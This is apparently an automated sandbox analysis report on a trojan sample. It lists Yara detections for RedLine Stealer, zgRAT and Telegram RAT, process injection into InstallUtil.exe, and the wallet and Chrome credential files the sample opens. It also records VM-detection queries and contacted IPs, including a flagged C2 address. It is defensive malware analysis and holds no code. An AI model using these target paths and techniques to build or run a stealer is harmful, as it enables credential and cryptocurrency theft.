Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE
Yara detected Telegram RAT
Source: Yara match File source: dump.pcap, type: PCAP
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003D98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE
Yara detected Telegram RAT
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 854232 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 26/04/2023 Architecture: WINDOWS Score: 100 26 Snort IDS alert for network traffic 2->26 28 Found malware configuration 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 10 other signatures 2->32 7 SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe 15 4 2->7         started        process3 dnsIp4 22 api.telegram.org 149.154.167.220, 443, 49696 TELEGRAMRU United Kingdom 7->22 20 SecuriteInfo.com.T....22677.6209.exe.log, ASCII 7->20 dropped 34 Encrypted powershell cmdline option found 7->34 36 Writes to foreign memory regions 7->36 38 Injects a PE file into a foreign processes 7->38 12 InstallUtil.exe 4 7->12         started        16 powershell.exe 16 7->16         started        file5 signatures6 process7 dnsIp8 24 5.75.134.144, 49697, 7985 HETZNER-ASDE Germany 12->24 40 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->40 42 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->42 44 Tries to harvest and steal browser information (history, passwords, etc) 12->44 46 Tries to steal Crypto Currency Wallets 12->46 18 conhost.exe 16->18         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
5.75.134.144
 unknown Germany
24940 HETZNER-ASDE true

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
5.75.134.144:7985 true
  • Avira URL Cloud: safe
 unknown